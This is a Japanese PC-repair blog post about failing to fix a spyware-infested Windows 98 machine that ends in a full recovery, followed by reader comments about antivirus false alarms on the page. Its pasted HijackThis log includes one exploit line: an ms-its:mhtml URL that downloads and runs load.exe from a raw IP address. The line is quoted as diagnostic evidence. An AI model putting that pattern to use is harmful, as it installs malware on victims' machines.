ウイルス対策ソフトをご利用の場合、「トロイの木馬」を誤検出する記事があります。警告が出た際は、こちらの記事をごらんの上、お知らせいただければ幸いです。

« ドコモPHSの存在価値。 | トップページ | なつかし?のLaroux(ラルー)。 »

2005年3月 3日 (木)

痛恨のリカバリー。その2

このエントリーをはてなブックマークに追加 このエントリーを含むはてなブックマーク この記事をクリップ! BuzzurlにブックマークBuzzurlにブックマーク

03AY16起動しなくなったパソコンの中にデータがあるのでなんとか救い出して欲しい、という依頼がきました。
セーフモードでは起動するのでデータ救出はたいした手間ではありませんでした。
起動不良は復旧できると見込んでいましたが…。

くだんのパソコンは、Windows98で、起動しなくなった状態は、まずはWindowsロゴが出てから、最初の壁紙表示までは到達するのですが、

Mprexe
このプログラムは不正な処理を行ったので強制終了されます。  [閉じる(C)]
終了しない場合は、プログラムの製造元に連絡してください。  [詳細(D)>>]

MPREXE の一般保護違反です。
モジュール:KERNEL32.DLL、アドレス:0167:bff7decd
Registers:
(以下省略)

というエラーダイアログが出て止まるのです。
[閉じる]を押したら、そのままキーボードが利かなくなり、電源の強制切断以外は何もできない。
セーフモードでは起動します。
一応、フロッピーでハードディスクの診断ツールを使って、ハードディスク自体に損傷が無いことを確認。
持ち帰り修理と相成りました。


いつもの起動項目確認ツールHijackThisを使って確認したところ、出るわ出るわ、スパイウェアのオンパレード。

O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {BDA6EB21-8322-11D9-9417-0007EE12D253} - C:\WINDOWS\SYSTEM\KPDP.DLL
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\DOWNLO~1\CNSMIN.DLL,Rundll32
O4 - HKLM\..\Run: [SysTime] C:\WINDOWS\SYSTEM\systime.exe
O4 - HKLM\..\Run: [ntddetect] WS\SYSTEM\ntddetect.exe
O4 - HKLM\..\Run: [sp] rundll32 C:\WINDOWS\TEMP\SE.DLL,DllInstall
O4 - HKLM\..\RunServices: [ntddetect] WS\SYSTEM\ntddetect.exe
O4 - HKCU\..\Run: [SysTime] C:\WINDOWS\SYSTEM\systime.exe
O4 - HKCU\..\Run: [ntddetect] WS\SYSTEM\ntddetect.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O11 - Options group: [!CNS] JWord(日本語キーワード)
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.searchbarcash.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.xxxtoolbar.com
O15 - Trusted Zone: *.slotch.com
O15 - Trusted Zone: *.flingstone.com
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.blazefind.com
O15 - Trusted Zone: *.clickspring.net
O15 - Trusted Zone: *.ysbweb.com
O15 - Trusted Zone: *.slotchbar.com
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://C:\nosuch.mht!http://213.159.117.133/dl/mikhalych/x.chm::/load.exe
O18 - Filter: text/html - {BDA6EB20-8322-11D9-9417-0007815E77C8} - C:\WINDOWS\SYSTEM\KPDP.DLL
O18 - Filter: text/plain - {BDA6EB20-8322-11D9-9417-0007815E77C8} - C:\WINDOWS\SYSTEM\KPDP.DLL

それにしても…やっぱりいますね、searchmiracle.com。
こういう凶悪な症状のパソコンには当たり前のようにいてくれますねぇ。

これらはすべてスパイウェア・アドウェア関連なので、すべてHijackThisでFIXして起動しないようにしました。
ちなみに、この中にある「KPDP.DLL」というものは、検索エンジンで調べた限りでは、満足な情報が得られませんでした。
まぁ要するにWindowsの正規のものではないということだと思われますので起動から外しました。

ところでこの中に入れてませんが、怪しげだったのは
O4 - HKLM\..\Run: [cFosInst_Check] C:\WINDOWS\OEMCFOS2\CFOSINST.EXE -install -loud
これ。
でもいろいろ調べていたら、どうもADSLモデム用のファイルらしい。
Yahoo!BBをお使いでしたので、おそらくそれで入っていたのでしょう。

…で、再起動してみましたが全然ダメ。症状変わらず。

パスワードファイル「*.pwl」が壊れているとそうなるらしい、という情報もありましたので削除して再起動しましたが全く変わらず。

しょうがないのでセーフモードからmsconfigコマンドを使い、systrayとinternatのみ起動するようにしてみましたが、やはり症状は変わらず。

定番ツールSpybotとAdawareSEをインストールしようとしたのですが、とにかくセーフモードでしか起動しないので、そのままではSpybotもAdawareSEもインストールができません。
セーフモードではCDを認識しないからです。
どちらもフロッピーに入りきる容量ではないのでフロッピーからのコピーは不可。
苦肉の策で、昔作った、CDドライブを認識した状態で起動できるWindows95起動用フロッピーで起動し、MS-DOSコマンドを使って、CDからC:\ドライブにSpybotとAdawareSEのインストーラーをコピーし、セーフモードで起動後、インストーラーを起動してインストール。

とりあえず両方で検知できるファイル・レジストリはすべて削除したものの、やはり通常の起動ではMprexeのエラーで止まる症状は全く変化なし。

あとは、C:\Bootlog.txtの情報を見てみると、どうもフォントの読み込み異常があったようなので、マイクロソフトサポートオンラインのKB146904より、フォントファイルの修復を行いましたが現象変わらず。

Windows98のSFC(システムファイルチェッカー)で自動で損傷ファイルを復元したり、MprexeやらKERNEL32.DLLやらUSER.EXEやら、おもだったシステムファイルを手動で復元したりしましたが変わらず。
CommandPromptOnlyで起動して、scanreg /fix と scanreg /opt でレジストリの再構築を行ってもダメ。
ハードディスクに損傷が無いことはわかっていましたが、一応スキャンディスクで完全チェックを行ったんですが、やはりダメ。

最後の手段、Windowsの上書きインストールをやってみました。
はっきり言って、これでまともな状態にできた例は少ないので、私はよほど手が無くなった時以外はやりません。
メーカー製PCなので、リカバリーCDからは上書きインストールは不可ですから、

C:\WINDOWS\OPTIONS\Cabs\Setup.exe

を起動して、Windowsのインストーラーを起動しました。
メーカー製のためでしょうか、通常は再起動までに何度かクリックしなければならない項目があるのですが、すべて自動でスキップされて再起動がかかりました。
そして利用者名・プロダクトIDを打ち込んで起動…やはり症状変わらず。
Mprexeのエラーで止まります。

もう打つ手がなくなりました。
ここまで手間と時間をかけておいて、結局リカバリーです。
かなり情けない状態です。
結果から言えば、それなら最初からやってれば時間の無駄がなかったのに、と言えます。
しかし、
リカバリーをかけたら、快調に動いています。当たり前ですが。
今回は、お客さんもデータの救出ができたらリカバリーしてもいい、という話でしたのでまだいいのですが、丸一日以上かけて結局リカバリー。まさしく痛恨のリカバリーです。
まぁいろんなパソコンがありますから、こういうことも何度かあるでしょう。
でも、リカバリー(初期化)は、いつも最後の手段です。

-----

リカバリーすれば、何の問題もなくなることは確かなことです。
しかし、それで満足するお客さんはほとんどいません。
なぜなら、苦労して作ったデータや二度と撮れないデジカメのデータやあれこれいじりながら作り上げた環境は、リカバリーしたら全て消えてなくなり、永遠に戻らないからです。
そういったデータが、パソコンが起動しなくなっても困らないようにきちんとバックアップしている人であれば、うちのような業者に電話などしませんし、動作がおかしくなったら迷うことなくリカバリーをかけるはずです。
でも、世の中にはそういう用意周到な人は、パソコンに慣れている人の中でもまれです。
ましてやパソコンユーザーの9割近くである「自称初心者」のかたがたならなおさら。

メーカーや販売店は、こういったきめ細かなサポートが出来ません。
そういうことができるスキルを持った人材を育てることができないからです。
結局は「データのバックアップはお客様の責任で」という言い逃れのもと、手っ取り早いリカバリーで「直りました」ということにしてしまう。
だからこそ、うちのような業者にも仕事がまわってくるのですが、こういう現状ってどうなんでしょう。
それでもパソコンを使わなければならない「自称初心者」は、ホント大変だと思います…。

ちなみに、人気blogランキング参加中です。 よろしくお願いします。

このエントリーをはてなブックマークに追加 このエントリーを含むはてなブックマーク この記事をクリップ! BuzzurlにブックマークBuzzurlにブックマーク

2005年03月03日(木) ウィルス・スパイウェア関連, ソフトウェア不具合関連(リカバリ), データ救出・バックアップ, ハードウェア不具合関連(ハードディスク), パソコントラブル, パソコン・インターネット, フリーズ・ブルースクリーン・再起動・電源切れる, 日記・コラム・つぶやき, 起動しない・起動が遅い |

« ドコモPHSの存在価値。 | トップページ | なつかし?のLaroux(ラルー)。 »

ウィルス・スパイウェア関連」カテゴリの記事

ソフトウェア不具合関連(リカバリ)」カテゴリの記事

データ救出・バックアップ」カテゴリの記事

ハードウェア不具合関連(ハードディスク)」カテゴリの記事

パソコントラブル」カテゴリの記事

パソコン・インターネット」カテゴリの記事

フリーズ・ブルースクリーン・再起動・電源切れる」カテゴリの記事

日記・コラム・つぶやき」カテゴリの記事

起動しない・起動が遅い」カテゴリの記事

トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/13757/3152242/void
↑トラックバックをいただく際は、最後の「/void」を抜いてください。お手数ですがよろしくお願いいたします。

※あまりにも無関係なトラックバックが多いため、当面はトラックバックの公開は承認制にしました。トラックバックを送っていただいてもすぐには反映されません。ご了承願います。

※トラックバックをいただく際は、この記事のURLを記事中に記載(もしくはリンク挿入)願います。
この記事と無関係な内容であったり、明らかな宣伝もしくは宣伝活動目的と判断されるもの、トラックバック元がトップページへのリンクであるもの、もしくは当方が不適切と判断されたものは、公開の承認はなされません。あらかじめご了承願います。

この記事へのトラックバック一覧です: 痛恨のリカバリー。その2:

» スパイウェア被害の変容と対処法 トラックバック Pasosavi Blog
最近のスパイウェアは、本当にしつこく、しぶとく、醜悪である。今のところ、これらをすべて自動で削除したり、侵入を完全にシャットアウトしたり、といった技術は、残念な... 続きを読む

受信: 2005/03/10 5:48:06

コメント

セーフモードからmsconfigコマンドを使い、systrayとinternatのみ起動する

CDドライブを認識した状態で起動できるWindows95起動用フロッピーで起動し、MS-DOSコマンドを使って、CDからC:\ドライブにSpybotとAdawareSEのインストーラーをコピー

こういう高度な技術はどうやって身に付けましたか?拝読するまで知りませんでした。

投稿: prtwqq | 2005/12/24 11:21:46

これはPC-98にwin95インストするのによく使いましたね。

投稿: junta | 2006/08/14 8:32:09

Win9xシリーズならフロッピー起動ででもHDDの中身が見れたのですが、最近のOS(WinNT系)だと、見ることが出来なくてホント 難儀しますヨね?!

投稿: チップ'nDALE | 2006/12/01 21:16:49

初めまして。HN フィリアといいます。
誤検出の記事で、わたしもひっかかりました。
しかも、この記事だけです。”avast!の誤検出。”は引っかかりませんでした。
引っかかったのは”ms-its:mhtml:file://C:\”という語群です。ルートディレクトリの\をなくしたら引っかかりません。
環境は簡単にXP SP1, Kaspersky Internet Security 6.0 (evaluation)です。

投稿: phiria | 2007/06/09 20:00:22

avast! の誤検出のリンクからこのページへ来たらNortonInternetsecurity2008(定義 2007.09.16.002)が

AutoProtect
ヒューリスティックウイルス検出
Bolldhound.Exploit.6
(危険度 高レベル)
遮断しました。

と言ってます。
特に実害は無いようですが
これも 誤検出でしょうか?

追伸
このコメントを書いて確認ボタンを押したら
又 同じメッセージが出ました。

投稿: ヒロシ | 2007/09/17 18:12:54

ヒロシ さん
ご報告ありがとうございました。
コメント投稿の確認ボタンを押した状態(コメントプレビュー)で出るのなら、記事の内容は関係ないと思われます。
おそらく、直前のphiria さんのコメントの「NGワード」で引っかかったと推測されます。

ところで、もしかして、「Bolldhound.Exploit.6」ではなく「Bloodhound.Exploit.6」ではないでしょうか?
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2004-031218-0648-99
だとすると、有名なノートンの誤検出なのかもしれません。
【アダ被】フォーラム :: トピックを表示 - ウイルスが検知されたページを閲覧したいのですが・・・
http://forum.higaitaisaku.com/viewtopic.php?t=1378&start=0
「Norton に典型的なもの」なんだそうですよ。
しかし、当方にはそれを確認する環境(NIS2008)はまだありません。

誤検出かどうかの確認手法は、
パソコントラブル出張修理・サポート日記: avast!の誤検出。
http://orbit.cocolog-nifty.com/supportdiary/2005/06/avast_3188.html
にも書いてあります。
もしお時間があれば、その辺をお試しいただいた上で結果を教えていただけると幸いです。


でも、なんかNortonも「Bloodhound.Exploit.6」に限らずとんでもない誤検出があるようですね…。

Norton AntiVirus、Wikiをウイルスと誤認して全削除 - GIGAZINE
http://gigazine.net/index.php?/news/comments/20070303_norton_delete_tiddlywiki/

要は、いくら検出性能がよくても、「誤検出は100%ない、というわけではない」ということです。

投稿: ささもと | 2007/09/18 8:41:05

早速のコメントありがとうございます。
>、「Bolldhound.Exploit.6」ではなく「Bloodhound.Exploit.6」ではないでしょうか?

そのとおりです。 NISのダイアログからコピペ出来なかったので間違いました... 。

怪しいところをテキストファイルに貼り付けて試したところ
この行に反応してました。
O16 - DPF: {11111111-1111-1111 ~中略~ /load.exe

参考までお知らせします。

>当方にはそれを確認する環境(NIS2008)はまだありません。
話はそれますが 今回も Symantecが 更新期限の残っているNIS2006 2007ユーザ 向けに無償でアップデートを初めています。 Norton Update Center
ただし, NIS2008へのアップデートファイルへは、素直に行かせてくれませんでした。

投稿: ヒロシ | 2007/09/18 16:15:29

ヒロシ さん
ご報告ありがとうございました。
返答が遅くなりすみません。
記事ではなくコメント投稿前のプレビューやテキストファイルでも反応するところから考えると、どうやらノートンの誤検出と見て間違いなさそうですね。
お知らせの記事もちょっと古くなりつつありますし、修正をしておく必要がありそうですね。

投稿: ささもと | 2007/09/22 18:45:37

コメントを書く




※Spam対策のため、コメント公開時E-Mailは非表示となります。









※当面コメントは承認後の公開となります

« ドコモPHSの存在価値。 | トップページ | なつかし?のLaroux(ラルー)。 »